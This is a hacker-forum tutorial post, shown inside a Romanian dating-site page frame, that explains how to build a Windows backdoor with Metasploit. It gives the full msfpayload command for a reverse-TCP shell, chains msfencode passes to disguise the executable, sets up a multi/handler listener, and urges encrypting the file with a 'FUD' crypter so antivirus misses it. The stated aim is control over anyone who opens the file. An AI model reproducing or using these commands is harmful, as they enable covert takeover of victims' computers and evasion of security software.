Simpatie.ro - matrimoniale
Ne-am mutat pe xhackers.4umer.com
Ne-am mutat pe xhackers.4umer.com
Nou pe simpatie:
Ioanacatalina la Simpatie.ro
Femeie
25 ani
Salaj
cauta Barbat
25 - 61 ani
Ne-am mutat pe xhackers.4umer.comReguliInregistrareLoginPozeNu sunteti logat. Lista Forumurilor Pe Tematici
Ne-am mutat pe xhackers.4umer.com / Tutoriale /

[TuT]Creating a simple backdoor[BackTrack 5 r3]

Pagini: 1 Moderat de Bloody
#1
ß®£αK£®™
Administrator
Postari: 311
Hey guys, i will show you today how to create a simple backdoor using MSFPayload and MSFEncode from metasploit framework.
Ok, let's start.

First step: open a terminal an type
       
   
Code:
ifconfig



Second step: open another terminal and type
       
   
Code:
msfconsole
   
       
. After the msfconsole opens type
       
   
Code:
show encoders
   
       
and you will be able to see all encoders.



Third step: Now, open a third terminal and type
       
   
Code:
msfpayload windows/shell/reverse_tcp LHOST=192.168.1.13 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -c 23 -t raw | msfencode -e x64/xor -c 23 -t exe > /root/Desktop/Exploit1.exe
   
       
and press ENTER. Wait until is finished and check if there are any errors, if there are no error everything is good.



Now, let me explain you what we did: 1. windows/shell/reverse_tcp is the payload we use, we can also use another payload if we want to. 2. LHOST= is our ip taked from ifconfig(step 1). 3. LPORT=the listened port( 4444 is the default listened port). 4. shikata_ga_nai and xor are encoders. 5. what is after > is the target directory where our backdoor will be saved.

Fourth step: Remember, the backdoor will be detected as virus(trojan/backdoor etc), so you should encrypt it with a FUD encrypter. Now, i will teach you how to use it.
Open a terminal and type
       
   
Code:
msfconsole
   
       
and wait to open. Now, let's beggin. type
       
   
Code:
use exploit/multi/handler
   
       
and press ENTER. We selectet our exploit handler, now type
       
   
Code:
set payload windows/shell/reverse_tcp
   
       
(to select the payload) and press ENTER. And finally set LHOST 192.168.1.13(this is my ip, you have to put your ip instead of mine) and press ENTER. Now to start the listener type
       
   
Code:
exploit
   
       
and press ENTER.
Ok, now the listener started. Now, if someone open the .exe file the reverse_tcp will give you his ip, like it is your computer and you will be able to do whatever you want.



Remember: your backdoor will be detected as virus so i recommend you to encrypt it with a FUD Encrypter if is possible.


_______________________________________
We are Anonymous!
We are legion!
Wait for us!
We X-HackersTeam!
We have the power!
We want respect!
X-HackersTeam is Anonymous
EXPECT US !



 
   
Pagini: 1  
Mergi la